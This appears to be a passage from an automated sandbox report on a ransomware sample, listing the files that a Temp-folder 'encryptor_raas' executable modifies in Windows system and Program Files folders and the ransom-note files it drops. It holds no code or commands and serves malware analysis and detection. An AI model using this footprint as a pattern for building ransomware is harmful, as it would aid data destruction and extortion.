File created C:\Windows\System32\DriverStore\FileRepository\mdmsun2.inf_amd64_neutral_242c76ad2e288fb4\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\netk57a.inf_amd64_neutral_8b26ad5d0cc037a9\netk57a.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_execution_policies.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_data_sections.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\atiilhag.inf_amd64_neutral_0a660e899f5038a2\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\netl1e64.inf_amd64_neutral_22118b1072f57433\netl1e64.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_remote.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpd5300t.exp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\en-US\Licenses\eval\StarterN\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\blbdrive.inf_amd64_neutral_1aa816fe7dc98c3f\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\prnod002.inf_amd64_neutral_a10c656b6c7c053c\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiaep002.inf_amd64_neutral_0a982dec66379cb0\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\eval\UltimateE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnky307.inf_amd64_ja-jp_e40bd14f18e8ff7d\prnky307.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_If.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_transactions.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmagm64.inf_amd64_neutral_ef322a8cc2738a9b\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\_Default\Ultimate\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmke.inf_amd64_neutral_3e4daa83122b1559\mdmke.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_data_sections.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_amd64_neutral_857ff0fa9c73850a\mdmnis3t.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_command_precedence.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_eventlogs.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\ph3xibc0.inf_amd64_neutral_c24bcc939e6dfc23\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wiaca00a.inf_amd64_neutral_163313056d8f34ab\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnbr005.inf_amd64_neutral_9e4cc05e0d4bcb33\prnbr005.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WCN\de-DE\Add_a_device_or_computer_to_a_network_usb.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_Automatic_Variables.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\cxraptor_philipstuv1236d_ibv64.inf_amd64_neutral_b6a3e57df5bad299\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_neutral_0383c5de75359695\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Enterprise\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\UltimateE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp005.inf_amd64_neutral_914d6c300207814f\Amd64\hp6500nt.cfg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_remote_troubleshooting.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_amd64_neutral_857ff0fa9c73850a\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmsuprv.inf_amd64_neutral_31d10a1a73b4feaa\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\es-ES\Licenses\eval\HomePremiumN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prngt002.inf_amd64_neutral_df2060d80de9ff13\prngt002.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\fr-FR\Licenses\OEM\Enterprise\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\LogFiles\AIT\AitEventLog.etl.005 C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\de-DE\Licenses\eval\StarterN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\en-US\Licenses\OEM\EnterpriseN\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasicE\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\prnhp003.inf_amd64_neutral_4480210763997eb4\Amd64\hpd4100t.exp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\it-IT\Licenses\_Default\HomeBasic\license.rtf C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\bthprint.inf_amd64_neutral_3c11362fa327f5a4\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmgl002.inf_amd64_neutral_e204d4267d752eb7\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmgl003.inf_amd64_neutral_4c78da9e48068043\mdmgl003.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\System32\DriverStore\FileRepository\mdmsmart.inf_amd64_neutral_829e8c7d1c8d5207\mdmsmart.PNF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_try_catch_finally.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_providers.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_functions_advanced.help.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\angel264.inf_amd64_neutral_04b54b6322607cce\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\wialx003.inf_amd64_neutral_db618863f9347f9a\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_ja.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_02.MID C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01235U.BMP C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_s.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\SAMPLES\SOLVSAMP.XLS C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_flyout.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\MMHMM.WAV C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14582_.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\SpaceSelector.ico C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_bullets.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\tile_drop_shadow.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\GetExpand.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_MediumMAsk.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Notes_btn-back-static.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\menu_style_default_Thumbnail.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384885.JPG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR18F.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_over.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\JOURNAL\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\15x15dot.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationRight_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\IRIS\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util_1.7.0.v201011041433.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericonMask.bmp C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\az.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\localedata.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\readme_liesmich_encryptor_raas.txt C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG C:\Users\Admin\AppData\Local\Temp\encryptor_raas_9cffd965b4a0e662f6b98fd47d3b6ec9bc1b8581.exe N/A
